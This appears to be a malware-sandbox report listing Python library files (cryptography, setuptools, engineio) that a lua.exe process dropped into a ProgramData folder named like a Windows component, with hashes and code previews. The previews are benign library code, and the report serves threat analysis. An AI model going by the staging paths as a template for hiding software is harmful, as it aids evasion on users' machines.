Encrypted:	false
SSDEEP:	96:Fw0ewd6f3gm519BKLCYQk+9Bn0cnxoh5S++An6xwrWpC6K8WRWBChT7bSwZWB2i9:Fwtwd+3j5IXJSy8ZTK8gWBwWBL
MD5:	69785018F031959EBDE3524470BC2540
SHA1:	317355268127166FB85996B6513B2325E778A176
SHA-256:	9EBE4193707F6FD2DA1BED678C49A8D1FFEC98083607A094E56AFAC0CAFCD4C2
SHA-512:	DEAAE823262C9CAF35B45D718A7A5DAF2ED1182274D1A10D9C1B8B5D1BB450ECE1CBC592566D3FBDE04DAB210657D61BE30185B3023D4FE174ADD245F50F63AA
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import abc.import datetime.from enum import Enum..import six..from cryptography import x509.from cryptography.hazmat.primitives import hashes.from cryptography.x509.base import (. _EARLIEST_UTC_TIME,. _convert_to_naive_utc_time,. _reject_duplicate_extension,.)..._OIDS_TO_HASH = {. "1.3.14.3.2.26": hashes.SHA1(),. "2.16.840.1.101.3.4.2.4": hashes.SHA224(),. "2.16.840.1.101.3.4.2.1": hashes.SHA256(),. "2.16.840.1.101.3.4.2.2": hashes.SHA384(),. "2.16.840.1.101.3.4.2.3": hashes.SHA512(),.}...class OCSPResponderEncoding(Enum):. HASH = "By Hash". NAME = "By Name"...class OCSPResponseStatus(Enum):. SUCCESSFUL = 0. MALFORMED_REQUEST = 1. INTERNAL_ERROR = 2. TRY_LATER = 3. SIG_REQUIRED = 5. UNAUTHORIZED

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\x509\oid.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	12594
Entropy (8bit):	5.492025601286956
Encrypted:	false
SSDEEP:	192:FJE2oLqMd3YMb8Ajmc5CyWf9X8H2mUOiHhKIgIBrADJrYX062dM:FJE1GtTF7o9LrY6dM
MD5:	5647D62FB6174B5EA339DA126BC7F1AD
SHA1:	D3D7FBBA9A12FD95CDBFC959EE7D1EB8525678D3
SHA-256:	5A9E98E1632B15AEEFB14995E2D6CCBCF3C0974222BB843143BA27DA7A7DE105
SHA-512:	3E5C2D18A73471E7A89BA96964974B0A16FA0E7CD7C211B0494E9A83C365E76A77CBBC7AEE0221163D59CF98483A0A4704B8E06A6F194857E0A38CF44D319F00
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..from cryptography.hazmat._oid import ObjectIdentifier.from cryptography.hazmat.primitives import hashes...class ExtensionOID(object):. SUBJECT_DIRECTORY_ATTRIBUTES = ObjectIdentifier("2.5.29.9"). SUBJECT_KEY_IDENTIFIER = ObjectIdentifier("2.5.29.14"). KEY_USAGE = ObjectIdentifier("2.5.29.15"). SUBJECT_ALTERNATIVE_NAME = ObjectIdentifier("2.5.29.17"). ISSUER_ALTERNATIVE_NAME = ObjectIdentifier("2.5.29.18"). BASIC_CONSTRAINTS = ObjectIdentifier("2.5.29.19"). NAME_CONSTRAINTS = ObjectIdentifier("2.5.29.30"). CRL_DISTRIBUTION_POINTS = ObjectIdentifier("2.5.29.31"). CERTIFICATE_POLICIES = ObjectIdentifier("2.5.29.32"). POLICY_MAPPINGS = ObjectIdentifier("2.5.29.33"). AUTHORITY_KEY_IDENTIFIER = ObjectIdentifier("2.5.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\distutils-precedence.pth Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	152
Entropy (8bit):	4.926892830610143
Encrypted:	false
SSDEEP:	3:JSxYEVoC2gxAxCKKFuGA0jpSHEBnJyY0MePAoSoKBW6BMW2y+C1e5k:aYEVo10AxCKeuXypcAnJyYPNB96W2y+C
MD5:	C39367750A2AD85B290FA7595D4CC457
SHA1:	4E2B7B413113994E4730EFE03E564A84CEBE2D73
SHA-256:	7EA7FFEF3FE2A117EE12C68ED6553617F0D7FD2F0590257C25C484959A3B7373
SHA-512:	40E5B4813F24601AD581C93FA0115454EF89E61F6B911644E3B89946280FF97CBD46AE00287D8DC71392EF6C940EBAA173D2E3C32DF72F0AA27D65ED73FE37C1
Malicious:	false
Preview:	import os; var = 'SETUPTOOLS_USE_DISTUTILS'; enabled = os.environ.get(var, 'stdlib') == 'local'; enabled and __import__('_distutils_hack').add_shim(); .

C:\ProgramData\ShellExperienceHost\Lib\site-packages\easy_install.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	126
Entropy (8bit):	4.423690747345368
Encrypted:	false
SSDEEP:	3:uZeUlILx3CFRLhAj5EMCrXKhRYLKfhb6MLWgLuBcN:uwVLoFAjajWh9b6KWgYU
MD5:	97B52FE7253BF4683F9F626F015EB72E
SHA1:	AACB1800C66DF9D4AA19B5527563421737F73020
SHA-256:	3030BDBEDE40C43B175F9A9C2A5073D939D6E93A6EBFF0286E77E1089F57DCF3
SHA-512:	2B44DEB5DC5F9DA7A2DC42E97D264F462A3D4B19088B399A4C09F2E6E9720BB6AC19A394E69D3A218264B4A4B1BE462DC0FC6DBB2C8C4A8A7A3C753434FFB3D4
Malicious:	false
Preview:	"""Run the EasyInstall command"""..if __name__ == '__main__':. from setuptools.command.easy_install import main. main().

C:\ProgramData\ShellExperienceHost\Lib\site-packages\engineio\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	787
Entropy (8bit):	4.649180794194717
Encrypted:	false
SSDEEP:	12:ky7B/gN8samFBXmu3w3PILqEnAfyppkQlnzN4uRwDGw37CyAfJZJP1HRBqjkYCls:k4Cvadub75IQPnwPCyaJXtHzYCgMM
MD5:	B5F305CE8D48514037268226DFA6E423
SHA1:	C6CBFBB005CD2D2A39007DB83DCE10FC90881F41
SHA-256:	F02EE2494F3027E7511BD838AA7B4CE06759A0DA126B6A168B0451DA4EDCB44A
SHA-512:	FBE21D75DACF4C909AD3F9BDFCF3B9F25761FD539EA313553A63BFC945544D6E4B43DF49EF00BBC32BC6BB61DE034BF661E472BAE91CDF39F910E80F32D089BF
Malicious:	false
Preview:	import sys..from .client import Client.from .middleware import WSGIApp, Middleware.from .server import Server.if sys.version_info >= (3, 5): # pragma: no cover. from .asyncio_server import AsyncServer. from .asyncio_client import AsyncClient. from .async_drivers.asgi import ASGIApp. try:. from .async_drivers.tornado import get_tornado_handler. except ImportError:. get_tornado_handler = None.else: # pragma: no cover. AsyncServer = None. AsyncClient = None. get_tornado_handler = None. ASGIApp = None..__version__ = '3.13.2'..__all__ = ['__version__', 'Server', 'WSGIApp', 'Middleware', 'Client'].if AsyncServer is not None: # pragma: no cover. __all__ += ['AsyncServer', 'ASGIApp', 'get_tornado_handler',. 'AsyncClient'],.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\engineio\async_drivers\aiohttp.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3777
Entropy (8bit):	4.711761006864299
Encrypted:	false
SSDEEP:	96:TRnwRj1MnVEVR6XbFwYiQSIeoedeQDeSeie5GXdo9LVayzQoT8I8/ZH:TRnwEnVEVR6XbFwG0JkZ7r50do9LVZG
MD5:	E925024E3857065DD47501A15671800A
SHA1:	68381CA1A7970D75ED9F31397D0DE68EDAB9E8AE
SHA-256:	7242E6F48AC7C730FBAE335D49E9662E423C9E085C28CF7A88D1F64CE2752D55
SHA-512:	0D511BF7F99F255C3F3B907C465187A745956FBD5EF9C6633887DC22E56B1E9EC7BC8FD229017F6BE891152D26B4CBA370A9FF54678EB1A431ABA46E248FB11D
Malicious:	false
Preview:	import asyncio.import sys.from urllib.parse import urlsplit..from aiohttp.web import Response, WebSocketResponse.import six...def create_route(app, engineio_server, engineio_endpoint):. """This function sets up the engine.io endpoint as a route for the. application... Note that both GET and POST requests must be hooked up on the engine.io. endpoint.. """. app.router.add_get(engineio_endpoint, engineio_server.handle_request). app.router.add_post(engineio_endpoint, engineio_server.handle_request). app.router.add_route('OPTIONS', engineio_endpoint,. engineio_server.handle_request)...def translate_request(request):. """This function takes the arguments passed to the request handler and. uses them to generate a WSGI compatible environ dictionary.. """. message = request._message. payload = request._payload.. uri_parts = urlsplit(message.path). environ = {. 'wsgi.input': payload,. 'wsgi.errors': sys.stderr,.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\engineio\async_drivers\asgi.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	9393
Entropy (8bit):	4.431161914805558
Encrypted:	false
SSDEEP:	192:ZrqJsIuMRH7GWeW/HYfml82GzTTFcdkZ7r5NZOik:ZrL24Z2GxU
MD5:	94829B056A4397A386F89074CE87CCE6
SHA1:	3DC6B02ECFAEB82A8CB39F298A18E333F5336A86
SHA-256:	CB3EC0CA637A39DFF9324716BEA5661E63D727B8AFA5E0CCB1CC85DE20D67882
SHA-512:	00B79C44AE8EC7F5BDB813FB14D1D91FD4D7CC25583EF2AC04F978B6DC83C397B731AA2FA4D09D2E1C8A1E24A2FFBC4BF83D9FAE8CBA0A448C9E3499A5752031
Malicious:	false
Preview:	import os.import sys.import asyncio..from engineio.static_files import get_static_file...class ASGIApp:. """ASGI application middleware for Engine.IO... This middleware dispatches traffic to an Engine.IO application. It can. also serve a list of static files to the client, or forward unrelated. HTTP traffic to another ASGI application... :param engineio_server: The Engine.IO server. Must be an instance of the. ``engineio.AsyncServer`` class.. :param static_files: A dictionary with static file mapping rules. See the. documentation for details on this argument.. :param other_asgi_app: A separate ASGI app that receives all other traffic.. :param engineio_path: The endpoint where the Engine.IO application should. be installed. The default value is appropriate for. most cases.. :param on_startup: function to be called on application startup; can be.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\engineio\async_drivers\eventlet.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	981
Entropy (8bit):	4.557200538191313
Encrypted:	false
SSDEEP:	24:1R2bso7DVyAD7VIireK6C+69m1NX2NA0k/A26:PAsokgVIi+TImXqA08A/
MD5:	56D1A1E543D6805BBD39903D51D9F4C5
SHA1:	3F7CEB4994201092D11D6DE9E6A6EE987348E4CF
SHA-256:	AF39DD937D7ABD25AB8A85DEEC08FED1AAEDC27A038907117F95682C3B8FCC47
SHA-512:	C7F895E1228189030E49472D4B84714F93AE92C63E7B1F703961FCB654D4FC6CAE9C34C0C1D9AC64844361B335736FB19AAC0D41EE84CE6F3A3374FC1C840DE2
Malicious:	false
Preview:	from __future__ import absolute_import..from eventlet.green.threading import Thread, Event.from eventlet import queue.from eventlet import sleep.from eventlet.websocket import WebSocketWSGI as _WebSocketWSGI...class WebSocketWSGI(_WebSocketWSGI):. def __init__(self, args, kwargs):. super(WebSocketWSGI, self).__init__(args, **kwargs). self._sock = None.. def __call__(self, environ, start_response):. if 'eventlet.input' not in environ:. raise RuntimeError('You need to use the eventlet server. '. 'See the Deployment section of the '. 'documentation for more information.'). self._sock = environ['eventlet.input'].get_socket(). return super(WebSocketWSGI, self).__call__(environ, start_response)..._async = {. 'thread': Thread,. 'queue': queue.Queue,. 'queue_empty': queue.Empty,. 'event': Event,. 'websocket': WebSocketWSGI,. 'sleep': sleep,.}.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\engineio\async_drivers\gevent.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1803
Entropy (8bit):	4.523209187698246
Encrypted:	false
SSDEEP:	48:PLALyuFQso4fRkFQ5o0yIiG2W1U5DHkp+qA/1A/iz:j8FQTWR0Qa0yIipHy+7S/6
MD5:	43CC2335001C2DEA4F21906686116E02
SHA1:	949D84EC999C8E12EFDAC4723BD04DC115EB9642
SHA-256:	E15E2851B1CC144B67D773DFF590E25A19763D1169B0FD6C27AFBA970D893BDF
SHA-512:	A39E3A9F8429F44F60C92729D78168F33AF9EE2A8803B8FC3D69E930AF13AE82847946A430D1F3D7FD6FCBC6BCFBB5B32BAEBB63B56A364F57C5AFD1F7D44181
Malicious:	false
Preview:	from __future__ import absolute_import..import gevent.from gevent import queue.from gevent.event import Event.try:. import geventwebsocket # noqa. _websocket_available = True.except ImportError:. _websocket_available = False...class Thread(gevent.Greenlet): # pragma: no cover. """. This wrapper class provides gevent Greenlet interface that is compatible. with the standard library's Thread class.. """. def __init__(self, target, args=[], kwargs={}):. super(Thread, self).__init__(target, args, *kwargs).. def _run(self):. return self.run()...class WebSocketWSGI(object): # pragma: no cover. """. This wrapper class provides a gevent WebSocket interface that is. compatible with eventlet's implementation.. """. def __init__(self, app):. self.app = app.. def __call__(self, environ, start_response):. if 'wsgi.websocket' not in environ:. raise RuntimeError('You need to use the gevent-websocket server. '.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\engineio\async_drivers\gevent_uwsgi.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5404
Entropy (8bit):	4.1714966699106695
Encrypted:	false
SSDEEP:	96:uUFQTWR0haUwIiX0eoHZiHtz9LMRAbMQTwXG7wo3777SN:uURuhDGwOorG77377I
MD5:	7378A70A64B0DF3244B3B867A282B65C
SHA1:	39C56095B9329767059136A02C4E5FE62DB193C4
SHA-256:	6A05831A8C1B7352043E0D46937A5F7BA7BBAD9AB9FE400D00CE88E19092C8F5
SHA-512:	8B33D03A6C54C031BE2B6A90EB96181738C3DC3B0EEB7A0C29AC726CF923B839FE5DD32C273B380947370FD51CA62B65EC1EE95FC849CA9BA814893B129C9F7D
Malicious:	false
Preview:	from __future__ import absolute_import..import six..import gevent.from gevent import queue.from gevent.event import Event.import uwsgi._websocket_available = hasattr(uwsgi, 'websocket_handshake')...class Thread(gevent.Greenlet): # pragma: no cover. """. This wrapper class provides gevent Greenlet interface that is compatible. with the standard library's Thread class.. """. def __init__(self, target, args=[], kwargs={}):. super(Thread, self).__init__(target, args, *kwargs).. def _run(self):. return self.run()...class uWSGIWebSocket(object): # pragma: no cover. """. This wrapper class provides a uWSGI WebSocket interface that is. compatible with eventlet's implementation.. """. def __init__(self, app):. self.app = app. self._sock = None.. def __call__(self, environ, start_response):. self._sock = uwsgi.connection_fd(). self.environ = environ.. uwsgi.websocket_handshake().. self._req_ctx = None

C:\ProgramData\ShellExperienceHost\Lib\site-packages\engineio\async_drivers\sanic.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4367
Entropy (8bit):	4.692776196513421
Encrypted:	false
SSDEEP:	96:kDYn7Rj1MjBHVe+F7e+ZYiQScUJXeWedeQDeSeie5GXdoCPKoaTzj7Cwl:k8n7EFHBFPZGH/kZ7r50doCPKoWJ
MD5:	9AD13817FEDCD38AC21935FE95F7BF7C
SHA1:	60282B5FF4CC1B75DA5167AFFB58AFEFAA3CA0FF
SHA-256:	1A3F7D00D0C78B0D98F5501DA70B9B8DD0770206B0024CC9D666CFDA1D7CF86B
SHA-512:	551E5CE687F197DC3B3640E235BEAA5B8C72730B4CCE9F4108C21D8DA5D05E068DD128B8469A21DC50B488CF16D8C68B48CF2EA74E29DDAE89E7724536979CE1
Malicious:	false
Preview:	import sys.from urllib.parse import urlsplit..try: # pragma: no cover. from sanic.response import HTTPResponse. from sanic.websocket import WebSocketProtocol.except ImportError:. HTTPResponse = None. WebSocketProtocol = None.import six...def create_route(app, engineio_server, engineio_endpoint): # pragma: no cover. """This function sets up the engine.io endpoint as a route for the. application... Note that both GET and POST requests must be hooked up on the engine.io. endpoint.. """. app.add_route(engineio_server.handle_request, engineio_endpoint,. methods=['GET', 'POST', 'OPTIONS']). try:. app.enable_websocket(). except AttributeError:. # ignore, this version does not support websocket. pass...def translate_request(request): # pragma: no cover. """This function takes the arguments passed to the request handler and. uses them to generate a WSGI compatible environ dictionary.. """. class AwaitablePa

C:\ProgramData\ShellExperienceHost\Lib\site-packages\engineio\async_drivers\threading.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	339
Entropy (8bit):	4.509980052820375
Encrypted:	false
SSDEEP:	6:1RMABCRR6QIzxukoQSYpLXaUmw39QtgEXQhtpwhB6tSOCfAQA0EO4J1A/UHLCwTi:1RjCNIzLxSYRSw3KtQtWf1A0k/AaLelF
MD5:	344316FDA58BB68C5C20234BF1C2C46D
SHA1:	1EF88A79D9B8F342059ECF824BD7BABC452072B2
SHA-256:	511347AAB615EE84EF1D6604AFBF898EA7C088A756246D92940CBEC2E96E9DC0
SHA-512:	8516A075F88D1090A349CF73A2E94D1B573D72F094C1B632181FFEF40A3AE62F661C08F11A0BE171945C77B799A888E7CB56EBB5331D021A1ADA71087167140E
Malicious:	false
Preview:	from __future__ import absolute_import.import threading.import time..try:. import queue.except ImportError: # pragma: no cover. import Queue as queue.._async = {. 'thread': threading.Thread,. 'queue': queue.Queue,. 'queue_empty': queue.Empty,. 'event': threading.Event,. 'websocket': None,. 'sleep': time.sleep,.}.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\engineio\async_drivers\tornado.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5971
Entropy (8bit):	4.564593512144497
Encrypted:	false
SSDEEP:	96:T2pqQHI09KdF7epd2YiQS4JecedeQSe5GXdo92BOWa4INcE3:T2EwXKdFU2Ghwdko50do92BOWcL
MD5:	9EA10B7AAB918DCB93811B6FF928FCBF
SHA1:	B316C806CF94AFB126512C3AE02569B0DA32A3E8
SHA-256:	1EFCA2FBA519E1FD5A007EBB9CAB3E4653DF60127EB4B638E5346E3B1AAD8652
SHA-512:	896F9863086D374488434138FA1B5724A06C1A2CD433246061FDFD32CFE3CFE1956B543894958C74E75282200FA12F7B605F5F0B7D5DC4C26F922F6F7311619F
Malicious:	false
Preview:	import asyncio.import sys.from urllib.parse import urlsplit.from .. import exceptions..import tornado.web.import tornado.websocket.import six...def get_tornado_handler(engineio_server):. class Handler(tornado.websocket.WebSocketHandler): # pragma: no cover. def __init__(self, args, kwargs):. super().__init__(args, *kwargs). if isinstance(engineio_server.cors_allowed_origins,. six.string_types):. if engineio_server.cors_allowed_origins == '':. self.allowed_origins = None. else:. self.allowed_origins = [. engineio_server.cors_allowed_origins]. else:. self.allowed_origins = engineio_server.cors_allowed_origins. self.receive_queue = asyncio.Queue().. async def get(self, args, *kwargs):. if self.request.headers.get('Upgrade', '').lower() == 'websocket':. ret = super()

C:\ProgramData\ShellExperienceHost\Lib\site-packages\engineio\asyncio_client.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	26386
Entropy (8bit):	4.140466289823901
Encrypted:	false
SSDEEP:	192:kg15GCeA7sT2RV+1CYCXM1PGzhUDCC6IwDXGWCSAmkkCSpICE+6U8F2FiJ17Wttg:k657evIv81KF7GoAveIWVvLTvL2StY
MD5:	23E7018505F64891950013C46F50EE2B
SHA1:	2D80608E11A06EE68FBCFECBFC7BE2B184B69999
SHA-256:	E73E441B3CEF3BEFAC24EAF6BD4FBD6612368B5BFE81A078B98FA4F5CE9F866A
SHA-512:	B436CFC2319AEA16DEBD070623FFAC0BBECA23947D49D490AC6E127300BD3506047D16AD82184D221BFA2E0D06E2162CD315436A8510A481CD97A822A359E70E
Malicious:	false
Preview:	import asyncio.import signal.import ssl.import threading..try:. import aiohttp.except ImportError: # pragma: no cover. aiohttp = None.import six..from . import client.from . import exceptions.from . import packet.from . import payload..async_signal_handler_set = False...def async_signal_handler():. """SIGINT handler... Disconnect all active async clients.. """. async def _handler():. for c in client.connected_clients[:]:. if c.is_asyncio_based():. await c.disconnect(). else: # pragma: no cover. pass.. asyncio.ensure_future(_handler())...class AsyncClient(client.Client):. """An Engine.IO client for asyncio... This class implements a fully compliant Engine.IO web client with support. for websocket and long-polling transports, compatible with the asyncio. framework on Python 3.5 or newer... :param logger: To enable logging set to ``True`` or pass a logger object to. use. To disable l

C:\ProgramData\ShellExperienceHost\Lib\site-packages\engineio\asyncio_server.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	21094
Entropy (8bit):	4.069922062547915
Encrypted:	false
SSDEEP:	384:i3hxH8+slQVX5T3RqN5CBj0jXjPlL6wIjt:i378+8QVXzqN5CBj0jXj9LSjt
MD5:	845850C4045D90E51897208E7A6AD480
SHA1:	C2D3A70ED935BDAF32D3C41BE71801E49931BE21
SHA-256:	A5F07659D656F3EA38B29059D073519DD5E6AACCA709C294D6EF9797B3959019
SHA-512:	16CB5B980C11643B0AC024C148887E8BD553692E27578D471C596A9E61228AC499EB4E095FD23B6E30A0B6C640186D61C95C2196F1AD43BD90946BF567002B2F
Malicious:	false
Preview:	import asyncio..import six.from six.moves import urllib..from . import exceptions.from . import packet.from . import server.from . import asyncio_socket...class AsyncServer(server.Server):. """An Engine.IO server for asyncio... This class implements a fully compliant Engine.IO web server with support. for websocket and long-polling transports, compatible with the asyncio. framework on Python 3.5 or newer... :param async_mode: The asynchronous model to use. See the Deployment. section in the documentation for a description of the. available options. Valid async modes are "aiohttp",. "sanic", "tornado" and "asgi". If this argument is not. given, "aiohttp" is tried first, followed by "sanic",. "tornado", and finally "asgi". The first async mode that. has all its dependencies installed is the one that is. chosen.. :param

C:\ProgramData\ShellExperienceHost\Lib\site-packages\engineio\asyncio_socket.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	9891
Entropy (8bit):	4.15445726011396
Encrypted:	false
SSDEEP:	96:2G0e+Uw2F9LZSIhsHiOfWt4wv9TK1L7UW9h0w/Ie1DZzAEH09Kc7dYzr7Ke:29vsJKDfe/v1KOWX/1DJATazH9
MD5:	24C2DC37A6215AE39E051D5ECB022D9D
SHA1:	FE1C6A8C1791B65FA377DA15F9C65DE52A9FD07D
SHA-256:	B4F6826E61EF95DB1B0EF232E982EF84C14A36AD190F950DAC2D5291146AA478
SHA-512:	1B75208B752598C25F2FE07F3713598A1D8B7F686D3199F76386B4DFB33CE2788D3EDB7CB795D24C2DAF9604970DDC29CD6D90B42FA55F8EDC6C7FAE725909C2
Malicious:	false
Preview:	import asyncio.import six.import sys.import time..from . import exceptions.from . import packet.from . import payload.from . import socket...class AsyncSocket(socket.Socket):. async def poll(self):. """Wait for packets to send to the client.""". try:. packets = [await asyncio.wait_for(self.queue.get(),. self.server.ping_timeout)]. self.queue.task_done(). except (asyncio.TimeoutError, asyncio.CancelledError):. raise exceptions.QueueEmpty(). if packets == [None]:. return []. while True:. try:. pkt = self.queue.get_nowait(). self.queue.task_done(). if pkt is None:. self.queue.put_nowait(None). break. packets.append(pkt). except asyncio.QueueEmpty:. break. return packets.. async def receive(self, pkt):. """Receive p

C:\ProgramData\ShellExperienceHost\Lib\site-packages\engineio\client.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	27810
Entropy (8bit):	4.212794614000847
Encrypted:	false
SSDEEP:	384:+LIlWtW4oTKZOYpMAmPHhcLhaZUaZr8HY:iIMtW4oT8OYpBmPEhaZUaZr8HY
MD5:	7492DACA4EC8856BB6CD4BAD08232A96
SHA1:	7971DA631634AE45A239E151D106A16C5CD307CD
SHA-256:	EB4F93A10FB15B9801DCF7AC6EC59628960B77C3AF115BEE6712F321DF831ADC
SHA-512:	E7B0734E4798161E89CCC30E81F3A4252EC6BBA7683B16469F4F0366C8B5CF04A1ACD9CF374ABCF1D259AF951D6618393494722F3147DCCDA91F7E6F4C7A5975
Malicious:	false
Preview:	import logging.try:. import queue.except ImportError: # pragma: no cover. import Queue as queue.import signal.import ssl.import threading.import time..import six.from six.moves import urllib.try:. import requests.except ImportError: # pragma: no cover. requests = None.try:. import websocket.except ImportError: # pragma: no cover. websocket = None.from . import exceptions.from . import packet.from . import payload..default_logger = logging.getLogger('engineio.client').connected_clients = []..if six.PY2: # pragma: no cover. ConnectionError = OSError...def signal_handler(sig, frame):. """SIGINT handler... Disconnect all active clients and then invoke the original signal handler.. """. for client in connected_clients[:]:. if not client.is_asyncio_based():. client.disconnect(). if callable(original_signal_handler):. return original_signal_handler(sig, frame). else: # pragma: no cover. # Handle case where no original

C:\ProgramData\ShellExperienceHost\Lib\site-packages\engineio\exceptions.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	292
Entropy (8bit):	4.391468906192719
Encrypted:	false
SSDEEP:	6:yjxcNyDqxMPLIDheOYPLIDyZ63D00JpPLID0dPL2:sxcV+UxUz6HXpK
MD5:	69369CA0C5751694417E56671D4DE00E
SHA1:	7F780660603BA16AFFF9A1A2B47DD1C1BA148211
SHA-256:	172B8C6F9AA15FD09460FDDF1287B59BE7DA53DE80A5D41349B6E569AA28F0B0
SHA-512:	248CB11AB07456EE885EA8FEF285A6E291817471674911222DFFD90F65A63D539100FF26602F7022DC8C970EC507C51B575377FD0D4447A691AB04E836D52D21
Malicious:	false
Preview:	class EngineIOError(Exception):. pass...class ContentTooLongError(EngineIOError):. pass...class UnknownPacketError(EngineIOError):. pass...class QueueEmpty(EngineIOError):. pass...class SocketIsClosedError(EngineIOError):. pass...class ConnectionError(EngineIOError):. pass.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\engineio\middleware.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3788
Entropy (8bit):	4.321147368002697
Encrypted:	false
SSDEEP:	96:BJxAv6v/nVeVBxV2mIiifD+lGqn0hcGQXU8K9eYV:BJo6lMRg7ygPhcGQX/KVV
MD5:	BFBF6E4837D841FCFAEECC51F9B2CFC7
SHA1:	AA13E5750665E8F67456DBC5931525E65DEA52CD
SHA-256:	9FC190324BDAE049A0041D41726E96FAC81883D00390653F5AB7DDD37752D6A2
SHA-512:	41808DA4D26417F08CA29B67E0D9436EB553A8E46A0AC178A37B59B9D68F69393BD2CD97B0CCC29215B712C53B8D2EA2F94EB5395FEF2A9F3A40F3AAAE2BE49C
Malicious:	false
Preview:	import os.from engineio.static_files import get_static_file...class WSGIApp(object):. """WSGI application middleware for Engine.IO... This middleware dispatches traffic to an Engine.IO application. It can. also serve a list of static files to the client, or forward unrelated. HTTP traffic to another WSGI application... :param engineio_app: The Engine.IO server. Must be an instance of the. ``engineio.Server`` class.. :param wsgi_app: The WSGI app that receives all other traffic.. :param static_files: A dictionary with static file mapping rules. See the. documentation for details on this argument.. :param engineio_path: The endpoint where the Engine.IO application should. be installed. The default value is appropriate for. most cases... Example usage::.. import engineio. import eventlet.. eio = engineio.Server(). app = engineio.WSGIApp(e

C:\ProgramData\ShellExperienceHost\Lib\site-packages\engineio\packet.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3506
Entropy (8bit):	4.299056107558707
Encrypted:	false
SSDEEP:	96:CoIbxsW7QVfVEY8f0e0csvmO/VzsBWeoahW:C8of0e0csOO/VzsBWzahW
MD5:	DF9C01B566335705ED678BA3CF55AAA8
SHA1:	4C1C44ADFBDDE197F197509CEB3F45F9DEBF090E
SHA-256:	DBFBD71CFED86D8DD73FC3A2CE50034912E6C29A0C25F42259F7C2FCD73E822B
SHA-512:	D19942E5191F776F43147DFD9186A89A6D4048C6AB9EBB36AAA70B66C35A7B0CB3C78B95622E1D9A23BCB450944115CF238BBB4A2C4974665EA408DA096981CD
Malicious:	false
Preview:	import base64.import json as _json..import six..(OPEN, CLOSE, PING, PONG, MESSAGE, UPGRADE, NOOP) = (0, 1, 2, 3, 4, 5, 6).packet_names = ['OPEN', 'CLOSE', 'PING', 'PONG', 'MESSAGE', 'UPGRADE', 'NOOP']..binary_types = (six.binary_type, bytearray)...class Packet(object):. """Engine.IO packet.""".. json = _json.. def __init__(self, packet_type=NOOP, data=None, binary=None,. encoded_packet=None):. self.packet_type = packet_type. self.data = data. if binary is not None:. self.binary = binary. elif isinstance(data, six.text_type):. self.binary = False. elif isinstance(data, binary_types):. self.binary = True. else:. self.binary = False. if encoded_packet:. self.decode(encoded_packet).. def encode(self, b64=False, always_bytes=True):. """Encode the packet for transmission.""". if self.binary and not b64:. encoded_packet = six.int2byte(sel

C:\ProgramData\ShellExperienceHost\Lib\site-packages\engineio\payload.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3106
Entropy (8bit):	4.086473676112849
Encrypted:	false
SSDEEP:	48:0S7jBU0wYvbLM9LantvviEE3e1dwoFFy4dpW63uy7/0Gep/06C:B7jBU0XLM9LOw33adwYFdDeDGFH
MD5:	5B79F836799D839C9F8D625AF56230A1
SHA1:	AF54E9B56C39FDDE3C01827ECF58A5DAA3059BBC
SHA-256:	D7661B4D09345C7E6954FFBD59C742574D3C0A0462DCF5DCDEF0817E9C0DBB15
SHA-512:	0AEFE64020D4846177B0982DA6377F03CBDA34F7A90CD94298451623B0E91015DA21200719591BFD57CB2500456A9DEE90F39479ECE06EA072CB0026D4DDE83A
Malicious:	false
